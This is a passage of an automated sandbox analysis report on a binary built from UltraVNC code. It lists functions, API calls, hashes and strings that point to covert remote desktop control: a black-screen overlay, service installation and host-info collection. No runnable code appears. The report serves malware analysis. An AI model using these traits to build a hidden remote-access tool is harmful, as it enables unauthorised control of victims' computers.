                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                                            • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (Intel Processor)$Current user :
                                                                            • API String ID: 171970310-3029765189
                                                                            • Opcode ID: 1cb7e10b7cb412b861b46b02bdf6de15515886615ce791076c371ea6f230fb72
                                                                            • Instruction ID: d0cb3a5a1240efa9525e1b64f06d474e90ba563ade590b4fd1695cb7739baa21
                                                                            • Opcode Fuzzy Hash: 1cb7e10b7cb412b861b46b02bdf6de15515886615ce791076c371ea6f230fb72
                                                                            • Instruction Fuzzy Hash: 61B1AF65A08A8695EB60CF3598402B937A0FB057BDF504336EABEC7BD5DEACE505C310
                                                                            Function 00007FF6C2B87B04 Relevance: 30.0, APIs: 9, Strings: 8, Instructions: 237COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                                            • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (Alpha Processor)$Current user :
                                                                            • API String ID: 171970310-733379141
                                                                            • Opcode ID: fb41818708b430e62bf73831d052d0c4d926f05be827444239f89a711e28a3fb
                                                                            • Instruction ID: 1295946154649eb3a0247bded5c5c2deac22c790aaff24982b9788813e2db80e
                                                                            • Opcode Fuzzy Hash: fb41818708b430e62bf73831d052d0c4d926f05be827444239f89a711e28a3fb
                                                                            • Instruction Fuzzy Hash: E0B1AF65A08A8695EB60CF3598402B937A0FB057BDF504336EABEC7BD5DEACE505C310
                                                                            Function 00007FF6C2B87ACF Relevance: 30.0, APIs: 9, Strings: 8, Instructions: 237COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                                            • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (SHX Processor)$Current user :
                                                                            • API String ID: 171970310-3227166451
                                                                            • Opcode ID: f87aec30509e434426b08c2f6c773820ec2921cd93d1ed894a2fb9928649058d
                                                                            • Instruction ID: f8028994a7bf0b28b922261340387a71a4ded54c7d38b655e7364a58f8266f65
                                                                            • Opcode Fuzzy Hash: f87aec30509e434426b08c2f6c773820ec2921cd93d1ed894a2fb9928649058d
                                                                            • Instruction Fuzzy Hash: 06B1AF25A08A8695EB60CF3598402B937A0FB057BDF504336EABEC7BD5DEACE505C310
                                                                            Function 00007FF6C2B87A9A Relevance: 30.0, APIs: 9, Strings: 8, Instructions: 237COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                                            • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (ARM Processor)$Current user :
                                                                            • API String ID: 171970310-978419383
                                                                            • Opcode ID: a8d8f491f9732d8cee92c56ad349269dc42da93c27ec5ad26cc636e7eff597dc
                                                                            • Instruction ID: 793ee3a5df88236d59de648bc7d548b0d448531879e7dff5f47ea9f56fcec496
                                                                            • Opcode Fuzzy Hash: a8d8f491f9732d8cee92c56ad349269dc42da93c27ec5ad26cc636e7eff597dc
                                                                            • Instruction Fuzzy Hash: 2FB1AF25A08A8695EB60CF3598402B937A0FB057BDF504336EABEC7BD5DEACE505C310
                                                                            Function 00007FF6C2B84200 Relevance: 29.8, APIs: 11, Strings: 6, Instructions: 90threadwindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Desktop$MessageThread$CloseCurrentDispatchInformationInputObjectOpenTranslateUser
                                                                            • String ID: black_layered.cpp : !GetUserObjectInformation $black_layered.cpp : OpenInputdesktop Error $black_layered.cpp : OpenInputdesktop OK$black_layered.cpp : SelectHDESK to %s (%x) from %x$black_layered.cpp : SelectHDESK:!SetThreadDesktop $black_layered.cpp : end BlackWindow
                                                                            • API String ID: 2763862709-1375279643
                                                                            • Opcode ID: 97dc65336ba64628ca373ffe4e0f0f58b485fa95820c520cbe5a523dd1110f8f
                                                                            • Instruction ID: d37d842cf74ef5a219e8cc0cb603970cefa1153677942d1332c5df368e567729
                                                                            • Opcode Fuzzy Hash: 97dc65336ba64628ca373ffe4e0f0f58b485fa95820c520cbe5a523dd1110f8f
                                                                            • Instruction Fuzzy Hash: 6A411C25A18A8391FB90DF65B8506B673B1FF8974EF844032DE8EC2764DEBCE1499740
                                                                            Function 00007FF6C2BA2CC0 Relevance: 24.8, APIs: 9, Strings: 5, Instructions: 256COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _errnofree$CriticalSectionTime_callnewh_getptdmalloc$AllocCurrentEnterFileHeapLeaveProcessSystemrand
                                                                            • String ID: View-only password authentication$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called$password authentication$vncclient.cpp : Failed to receive challenge response from client$vncclient.cpp : Failed to send challenge to client
                                                                            • API String ID: 3991686958-188493154
                                                                            • Opcode ID: 9d379260281130677ec767493c4a79257c318867dcb6e5a486f079a26b47f014
                                                                            • Instruction ID: 053fe45c9e6fa8e0c0ae98b231617e1499ed212921fd19465a79577f80e3f695
                                                                            • Opcode Fuzzy Hash: 9d379260281130677ec767493c4a79257c318867dcb6e5a486f079a26b47f014
                                                                            • Instruction Fuzzy Hash: 36B1AC22B08A8285EB40EF25D8502FD3361EF85B9DF448632DE9E877D6EEB8D545C340
                                                                            Function 00007FF6C2B9BB80 Relevance: 24.3, APIs: 16, Instructions: 345COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Rect$CombineDeleteObjectfree$CreateDataRegion$ErrorFreeHeapLast_errnomalloc
                                                                            • String ID:
                                                                            • API String ID: 2853843867-0
                                                                            • Opcode ID: fb07c060e62e59c92e14d8bba56b4331bd8ab4caa6675d378a5f059770ada6bd
                                                                            • Instruction ID: 5a4d4489d1ccc5c78b1a12f549da5a435c5139b566b349c03f0651d95633d7cc
                                                                            • Opcode Fuzzy Hash: fb07c060e62e59c92e14d8bba56b4331bd8ab4caa6675d378a5f059770ada6bd
                                                                            • Instruction Fuzzy Hash: 35E1C232A18A9186EB50DF66E4406AD77B0FB99B8DF005135EF8D83B54DFB8E851CB40
                                                                            Function 00007FF6C2B96930 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 180windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries, xrefs: 00007FF6C2B96A39
                                                                            • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette, xrefs: 00007FF6C2B969F2
                                                                            • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table, xrefs: 00007FF6C2B969A4
                                                                            • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette, xrefs: 00007FF6C2B96A0B
                                                                            • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done, xrefs: 00007FF6C2B96BB2
                                                                            • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called, xrefs: 00007FF6C2B9695B
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorFreeLastLibrary$AddressDeleteDisplayEntriesEnumHeapLoadPaletteProcReleaseSettingsSystem_errnofreemalloc
                                                                            • String ID: l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done
                                                                            • API String ID: 181403729-1081969236
                                                                            • Opcode ID: 356ec768b8f7f08761f25f9f6f5bd7aee8d03a8140df0f5e6c97a1197c639f56
                                                                            • Instruction ID: 540f873a87fd3e0965529aa4bdfc1efb21c3a159659c56d0d5fc439b33bf8f9d
                                                                            • Opcode Fuzzy Hash: 356ec768b8f7f08761f25f9f6f5bd7aee8d03a8140df0f5e6c97a1197c639f56
                                                                            • Instruction Fuzzy Hash: 7B614562B1859241EB58DF65D8652B933B0EB5634EF84803AEECEC7791EE7CD15AC300
                                                                            Function 00007FF6C2B84390 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 179windowsleepthreadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Message$FindPostSendSleepWindowmouse_event$CloseCreateHandleThread
                                                                            • String ID: blackscreen
                                                                            • API String ID: 1419467151-1520931032
                                                                            • Opcode ID: c13e5961689c7147809b67f205c06e05967d7aac8a0ba7f50e620ab93483d6c8
                                                                            • Instruction ID: c29d6dfae5fcdc854c2b7c842ff9cdb97d933153cc4262ff0b6a7f0772da8350
                                                                            • Opcode Fuzzy Hash: c13e5961689c7147809b67f205c06e05967d7aac8a0ba7f50e620ab93483d6c8
                                                                            • Instruction Fuzzy Hash: D5815E31E0A78382FB608F15E40067967B0AF96B4EF480576CEDD867A5DFEDE4409714
                                                                            Function 00007FF6C2BB1CE0 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 149COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSection$Leave$EnterInvalidateRect
                                                                            • String ID: Default$O$vncdesktop.cpp : Closing pending driver driver version$vncdesktop.cpp : Driver Used$vncdesktop.cpp : Driver option is enabled$vncdesktop.cpp : Shared memory mapped$vncdesktop.cpp : Start Mirror driver$vncdesktop.cpp : Start Mirror driver Failed$vncdesktop.cpp : Using non driver mode
                                                                            • API String ID: 3829719269-2763606790
                                                                            • Opcode ID: 652b5f9046d9b24421932a7dd2b51d09f8589ab305cb01d8b65987974c3b0a0b
                                                                            • Instruction ID: 9dd2291f5ab408dfb1a1319d4cd7661d129ea38ca41a57c19e396a19e1a2dc41
                                                                            • Opcode Fuzzy Hash: 652b5f9046d9b24421932a7dd2b51d09f8589ab305cb01d8b65987974c3b0a0b
                                                                            • Instruction Fuzzy Hash: E1715A36A18A8286E744DF25D4406E933B4FB89B4DF484536DE8E9B398CFB8E545C710
                                                                            Function 00007FF6C2B92D00 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 75serviceCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00007FF6C2B92FE0: GetModuleFileNameA.KERNEL32 ref: 00007FF6C2B93009
                                                                              • Part of subcall function 00007FF6C2B92FE0: SetCurrentDirectoryA.KERNEL32 ref: 00007FF6C2B93041
                                                                            • OpenSCManagerA.ADVAPI32 ref: 00007FF6C2B92D23
                                                                            • CreateServiceA.ADVAPI32 ref: 00007FF6C2B92DB6
                                                                            • GetLastError.KERNEL32 ref: 00007FF6C2B92DC4
                                                                            • CloseServiceHandle.ADVAPI32 ref: 00007FF6C2B92DFB
                                                                              • Part of subcall function 00007FF6C2B8A040: OpenInputDesktop.USER32(?,?,?,00007FF6C2B882D7), ref: 00007FF6C2B8A07A
                                                                              • Part of subcall function 00007FF6C2B8A040: GetCurrentThreadId.KERNEL32 ref: 00007FF6C2B8A083
                                                                              • Part of subcall function 00007FF6C2B8A040: GetThreadDesktop.USER32(?,?,?,00007FF6C2B882D7), ref: 00007FF6C2B8A08B
                                                                              • Part of subcall function 00007FF6C2B8A040: SetThreadDesktop.USER32(?,?,?,00007FF6C2B882D7), ref: 00007FF6C2B8A0A6
                                                                              • Part of subcall function 00007FF6C2B8A040: MessageBoxA.USER32 ref: 00007FF6C2B8A0B7
                                                                              • Part of subcall function 00007FF6C2B8A040: SetThreadDesktop.USER32(?,?,?,00007FF6C2B882D7), ref: 00007FF6C2B8A0C2
                                                                              • Part of subcall function 00007FF6C2B8A040: CloseDesktop.USER32(?,?,?,00007FF6C2B882D7), ref: 00007FF6C2B8A0CB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Desktop$Thread$CloseCurrentOpenService$CreateDirectoryErrorFileHandleInputLastManagerMessageModuleName
                                                                            • String ID: Failed to create a new service$Failed to open service control manager$Failed: Permission denied$Tcpip$UltraVNC$uvnc_service
                                                                            • API String ID: 1695331641-1004021400
                                                                            • Opcode ID: 6415f80341d9534cb3fadac7f1d9968ed7ad466c8fff1878714631192f384662
                                                                            • Instruction ID: 0c84bb0aaa78f27743903f05891517639b4321667f3d21b4589f0e71c6106fd1
                                                                            • Opcode Fuzzy Hash: 6415f80341d9534cb3fadac7f1d9968ed7ad466c8fff1878714631192f384662
